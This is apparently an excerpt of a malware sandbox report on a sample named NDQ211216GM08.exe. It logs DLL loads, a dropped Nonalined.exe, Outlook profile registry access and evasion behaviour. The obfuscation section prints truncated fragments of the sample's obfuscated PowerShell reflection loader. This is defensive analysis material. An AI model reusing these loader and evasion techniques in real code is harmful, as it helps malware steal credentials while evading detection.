Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: NDQ211216GM08.exe.bin.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match File source: 00000001.00000002.1434300899.000000000A131000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Temporals $Renovationsvsnet $Juvelbelgningens239), (Coagulable @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Recidivets = [AppDomain]::CurrentDomain.GetA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Jeanett)), $Sofabordene122).DefineDynamicModule($Perfect, $false).DefineType($Undermenuers150, $Flamineous, [System.MulticastDelegate]
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_08B80C27 push 8B05B59Fh; iretd 1_2_08B80C30
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_3_0019CA98 pushfd ; retf 0019h 11_3_0019CA99
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_3_0019EE8C push eax; iretd 11_3_0019EEA9
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_3_0019CF4C push eax; iretd 11_3_0019CF4D
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_3_0019EE60 push eax; iretd 11_3_0019EE65
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00159C30 push esp; retf 0017h 11_2_00159D55
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00154908 push eax; ret 11_2_00154922
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00154938 push eax; ret 11_2_00154932
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_0015496A push eax; ret 11_2_00154982
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00154998 push eax; ret 11_2_001549A2
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_00154988 push eax; ret 11_2_00154992
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C41EE push ecx; iretd 11_2_016C41F9
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C11DA pushfd ; iretd 11_2_016C11DD
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C241C push edx; iretd 11_2_016C242F
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C50BD push EB39B21Fh; iretd 11_2_016C50C2
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C3317 push esp; retf 11_2_016C3375
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C3386 push esp; retf 11_2_016C3375
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C5616 push es; iretd 11_2_016C5614
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C5ACD push edi; iretd 11_2_016C5ACE
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C56CA push DFDEEA70h; iretd 11_2_016C56D1
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Code function: 11_2_016C4EB9 push ecx; iretd 11_2_016C4EBA
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe File created: C:\Users\user\AppData\Local\Temp\nsv796.tmp\nsExec.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Nonalined.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe API/Special instruction interceptor: Address: 33B8475
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Memory allocated: 110000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Memory allocated: 20250000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Memory allocated: 20050000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599672
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599563
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599453
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599342
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599234
Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe Thread delayed: delay time: 599125
